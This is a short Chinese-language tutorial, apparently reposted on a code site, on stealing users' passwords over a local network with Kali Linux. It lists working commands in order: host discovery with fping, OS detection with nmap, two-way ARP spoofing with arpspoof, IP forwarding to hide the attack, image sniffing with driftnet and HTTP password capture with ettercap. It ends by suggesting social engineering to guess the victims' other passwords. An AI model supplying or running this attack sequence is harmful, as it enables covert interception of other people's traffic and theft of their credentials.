kali實現局域網arp欺騙竊取用戶密碼,手機適用


局域網arp欺騙
發現目標ip

fping -g -r 0 -s 192.168.1.0/24 | grep alive

192.168.1.1 is alive(網關)
192.168.1.107 is alive(我的電腦)
192.168.1.103 is alive
192.168.1.105 is alive
系統檢測

nmap -T4 -O 192.169.1.103 192.168.1.105 #后面ip是待檢測的ip

找到目標
arp欺騙

arpspoof -i eth0(網卡) -t 192.168.1.103(目標ip) 192.168.1.1(網關)

arpspoof -i eth0(網卡) -t 192.168.1.1(網關) 192.168.1.103(目標ip)

進行雙向欺騙

這時我手機上不了網了,造成斷網假象

附:arpspoof命令安裝

sudo apt-get install dsniff ssldump#不行就重啟一下
進行端口轉發

echo 1 > /proc/sys/net/ipv4/ip_forward

#如果權限不夠就:sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

cat /proc/sys/net/ipv4/ip_forward

發現輸出為1

這時手機就能上網了
進行圖片嗅探(http協議的)

driftnet -i eth0

附:driftnet安裝

sudo apt-get install driftnet
嗅探登錄密碼(http)

ettercap -Tq -i eth0

可以根據社會工程學,密碼唯一性,推測其他密碼
————————————————


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM